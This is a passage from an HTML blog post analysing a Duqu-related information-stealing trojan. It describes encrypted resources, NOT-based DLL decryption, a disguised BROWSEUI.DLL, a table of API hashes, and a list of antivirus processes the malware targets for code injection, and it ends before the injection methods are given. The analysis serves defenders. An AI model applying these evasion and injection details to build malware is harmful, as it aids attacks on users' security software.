<span style="color: #010101; font-family: Calibri;">/out <filename> - output file for its encrypted logs, default is ~DQx.tmp in %temp% folder if not specified.</span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_64Un9oexrGtI_rkl8epPhnlUBFnw5v5l9HtZ3njkF8gjFKarpJOONx8-9NdWGCbffDlQnYuJ2PoUHE-3WoSiso1JKG-rqXiyUV0eLFZQJBx4xgoTvGYVTZlSmExPZadA7khHIod/s1600/out_param.png" imageanchor="1" style="font-family: Tahoma; line-height: 14px; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8_64Un9oexrGtI_rkl8epPhnlUBFnw5v5l9HtZ3njkF8gjFKarpJOONx8-9NdWGCbffDlQnYuJ2PoUHE-3WoSiso1JKG-rqXiyUV0eLFZQJBx4xgoTvGYVTZlSmExPZadA7khHIod/s320/out_param.png" width="320" /></a></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 6f: “out” parameter, a ~DQxx.tmp file in %temp% folder is created if /out is not specified.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The executable has 2 resources in .rsrc section, #200 and #201. #200 is the encrypted DLL component while #201 is the encrypted configuration file to be used by the malware which specifies which stealing routines to execute later. Both of these resources are mapped in memory.</span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The executable then proceeds to decrypt its DLL module located in resource section (resource #200) embedded in a JPEG file. This DLL is detected by Vipre as Trojan.Win32.Duqu.d (v) and has a MD5 of 9a9e77d2b7792fbbddcd7ce05a4eb26e.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLF_HLzjAKrrs9LjlPGbZv77ou8Ps4CXgU8nYBcOziXk8gy2Kr6Hhn21scDRBxZcPdiscLCXNCmpzyDOCHvmYI7mDu8c1KmTEd1cZm26xaD08FbZgzjoawTAL7zE7LkCb1jEo72q0-/s1600/JPEG_format.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLF_HLzjAKrrs9LjlPGbZv77ou8Ps4CXgU8nYBcOziXk8gy2Kr6Hhn21scDRBxZcPdiscLCXNCmpzyDOCHvmYI7mDu8c1KmTEd1cZm26xaD08FbZgzjoawTAL7zE7LkCb1jEo72q0-/s320/JPEG_format.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 7: JPEG File Interchange Format as seen in the malware’s resource section</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The decryption routine is just a simple NOT operator. You can also use XOR BYTE PTR [EAX],0FF as a substitute in decrypting.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqklaiuOPSk8d0g8eorxvGtylY5WcqakijyeqRJ_09u56IlRBXC3GPVB5bpHMQUSMrQHTZ0Z8InIISOGBKIPi1AolqW8Lgz0WLzx0jFW6iOCq7quNuriLiDUMw6xBBrVZncXR93EE/s1600/decrpyt_dll.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqklaiuOPSk8d0g8eorxvGtylY5WcqakijyeqRJ_09u56IlRBXC3GPVB5bpHMQUSMrQHTZ0Z8InIISOGBKIPi1AolqW8Lgz0WLzx0jFW6iOCq7quNuriLiDUMw6xBBrVZncXR93EE/s320/decrpyt_dll.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 8: Decrypting the DLL module.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The DLL module is compressed with UPX_LZMA and fakes its file properties to avoid suspicion as seen in Figure 9.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAepbxJ97jcSnkGD18_rslk-QCukTVw9RARgCJa5bNVKthcHjJcs1XpiaGJrlOvOxxsHfotdYwKFmVJpJwupyroZfp3WfbTb5gdkPQFaAdePvvTKaGbcRK7F5jCAbNAmgVDeotD8wU/s1600/fake_browseui_dll.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAepbxJ97jcSnkGD18_rslk-QCukTVw9RARgCJa5bNVKthcHjJcs1XpiaGJrlOvOxxsHfotdYwKFmVJpJwupyroZfp3WfbTb5gdkPQFaAdePvvTKaGbcRK7F5jCAbNAmgVDeotD8wU/s320/fake_browseui_dll.png" width="232" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 9: Fake BROWSEUI.DLL disguised to avoid suspicion.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The malware APIs are found in hashes and their matching addresses are traversed to their corresponding DLLs. This is usually seen most in packers, encryptors and malwares nowadays. The hashes and the corresponding APIs are listed below:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">kernel32.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x88444BE9: CreateToolhelp32Snapshot</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x92D66FBA: Process32FirstW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD1A588DB: Process32NextW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xFCAA0AB8: OpenProcess</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xAE75A8DB: CreateProcessW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xCF5350C5: GetNativeSystemInfo</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xDCAA4C9F: IsWow64Process</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x4BBFABB8: lstrcmpiW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xA668559E: VirtualQuery</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x4761BB27: VirtualProtect</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD3E360E9: GetProcAddress</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x6B3749B3: MapViewOfFile</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD830E518: UnmapViewOfFile</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x78C93963: FlushInstructionCache</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD83E926D: LoadLibraryW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x19BD1298: FreeLibrary</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x6F8A172D: CreateThread</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xBF464446: WaitForSingleObject</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xAE16A0D4: GetExitCodeThread</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x3242AC18: GetSystemDirectoryW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x479DE84E: CreateFileW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xB67F8157: CreateRemoteThread</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">psapi.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xBCC7C0DA: GetModuleFileNameExW</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">advapi32.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x6012A950: RegOpenKeyExW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xC6151DC4: RegQueryValueExW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xF03A2554: RegCloseKey</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x9C6E14F8: CreateProcessAsUserW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x702B6244: DuplicateTokenEx</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x2EDB7947: OpenProcessToken</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x557DBBB6: LookupPrivilegeValueW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xE763A4A3: AdjustTokenPrivileges</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">version.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD4DE04DA: GetFileVersionInfoW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xCEF01246: VerQueryValueW</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">userenv.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x3E692063: CreateEnvironmentBlock</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xAFF5F91F: DestroyEnvironmentBlock</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ntdll.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x40C4EC59: ZwQueryInformationProcess</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x5FC5AD65: ZwCreateSection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x1D127D2F: ZwMapViewOfSection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x468B8A32: ZwUnmapViewOfSection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xDB8CE88C: ZwClose</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x8C6F89E1: ZwQuerySection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x7BCE6E19: ZwQueryAttributesFile</span></span></div>
</li>
</ul>
</div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">A code snippet; complete with comments, on how the malware traverses its imported APIs in a specified DLL export table in Figure 10:</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8WxcgQxgcMetSJetJXYII4FIRkj8XLTiS637QD3t_ndal9B0W1P_1VR8f4hLCR0CLm7uqlNGjQQSxVCDoKPczuKZSq3cCHH4KxHvfyUEPSfHv5NFy7PHKtozaBnCeTU3tL86jjwqF/s1600/malware_api_traverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8WxcgQxgcMetSJetJXYII4FIRkj8XLTiS637QD3t_ndal9B0W1P_1VR8f4hLCR0CLm7uqlNGjQQSxVCDoKPczuKZSq3cCHH4KxHvfyUEPSfHv5NFy7PHKtozaBnCeTU3tL86jjwqF/s320/malware_api_traverse.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 10: Malware API traversing 101.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> It then creates a system snapshot of running processes in memory and verifies if any software security related processes are running. It monitors the following:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">avp.exe - Kaspersky</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">Mcshield.exe - McAfee</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">avguard.exe - Avira</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">bdagent.exe - BitDefender</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">UmxCfg.exe - CA</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">fsdfwd.exe - F-Secure</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">rtvscan.exe - Symantec</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ccSvcHst.exe - Symantec</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ekrn.exe - Eset</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">tmproxy.exe - Trend Micro</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">RavMonD.exe - Rising</span></div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">If any of the following processes listed above is present, it will attempt to get the complete file path and the file version info of the running security software and will inject its malicious code here. The malware does this in three possible ways:</span></span></div>
